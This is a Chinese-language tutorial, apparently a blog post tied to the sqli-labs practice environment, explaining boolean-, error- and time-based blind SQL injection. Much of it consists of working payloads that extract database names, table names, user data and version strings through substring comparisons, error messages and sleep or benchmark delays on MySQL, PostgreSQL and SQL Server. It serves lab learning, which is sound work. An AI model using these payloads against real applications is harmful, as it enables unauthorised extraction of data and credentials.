sqli-labs—————Sql注入之盲注讲解

盲注

何为盲注？盲注就是在sql注入过程中，sql语句执行的选择后，选择的数据不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。
盲注分为三类

•基于布尔SQL盲注

•基于时间的SQL盲注

•基于报错的SQL盲注

1、基于布尔SQL盲注————构造逻辑判断

我们可以利用逻辑判断进行

截取字符串相关函数解析  http://blog.csdn.net/Fly_hps/article/details/80245853

left()函数

left(database(),1)>'s'

说明:database()显示数据库名称，left(a,b)从左侧截取a的前b位进行测试。

ascii()函数

ascii(substr(select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1) =101 --+

说明：substr(a,b,c)从b位置开始，截取字符串a的c长度。Ascii（）将某个字符转换为ascii值。

ord()函数

ord(mid(select ifnull(cast(username AS CHAR),0x20) from security.users order by id limit 0,1),1,1)>98

说明：mid(a,b,c)从位置b开始，截取a字符串的c位

ord函数同ascii函数一样都会将字符转为ascii值，之后进行比较操作

regexp正则注入

正则注入介绍：https://blog.csdn.net/Fly_hps/article/details/80246278

like配置注入

和上述的正则类似，mysql在匹配的时候我们可以用like进行匹配。
用法：select user() like 'ro%'

2、基于报错的SQL盲注————构造payload让信息通过错误提示回显出来

Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;

说明：此处有三个点
一是需要concat计数
二是floor,取得0 or 1，进行数据的重复
三是group by进行分组

但具体原理解释不是很通，大致原理为分组后数据计数时重复造成的错误。也有解释为mysql的bug的问题。但是此处需要将rand(0),rand()需要多试几次才行。
以上语句可以简化为如下的形式：

select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

如果关键的表被禁用了，可以使用这种形式

select count(*) from (select 1 union select null 
union  select !1) group by concat(version(),floor(rand(0)*2)) 

如果rand被禁用了，可以使用用户变量来报错

 select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)

extractvalue()

extractvalue(1,concat(0x7e,(select @@version),0x7e))

mysql对xml数据进行查询和修改的Xpath函数，Xpath语法错误。
参考文章：https://blog.csdn.net/Fly_hps/article/details/79416728

updatexml()

updatexml(1,concat(0x7e,(select @@version),0x7e),1)

mysql对XML数据进行查询和修改Xpath函数，Xpath语法错误
参考文章：https://blog.csdn.net/Fly_hps/article/details/79416842

3、基于时间的盲注

If(ascii(substr(database(),1,1))>115,0,sleep(5))%23

说明：if判断语句，当条件为假时，执行sleep

遇到以下这种利用sleep()延时注入语句：

select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.'));

该语句意思是在0-9之间找版本号的第一位。但是在我们实际渗透测试过程中，这种用法是不可取的，因为时间会有网速等其他因素的影响，所以会影响结果的判断。

UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM (select database() as current) as tb1;

banchmark(count,expr)用于测试函数的性能，参数一位次数，二为要执行的表达式。

可以让函数执行若干次，返回结果比平时长，通过时间长短的变化，判断语句是否执行成功。这是一种边信道攻击，在运行过程中占用大量的CPU资源。推荐使用sleep（）函数进行注入。

Mysql	BENCHMARK(100000,MD5(1))  or sleep(5)
Postgresql	PG_SLEEP(5)   OR GENERATE_SERIES(1,10000)
Ms sql server	WAITFOR DELAY '0:0:5'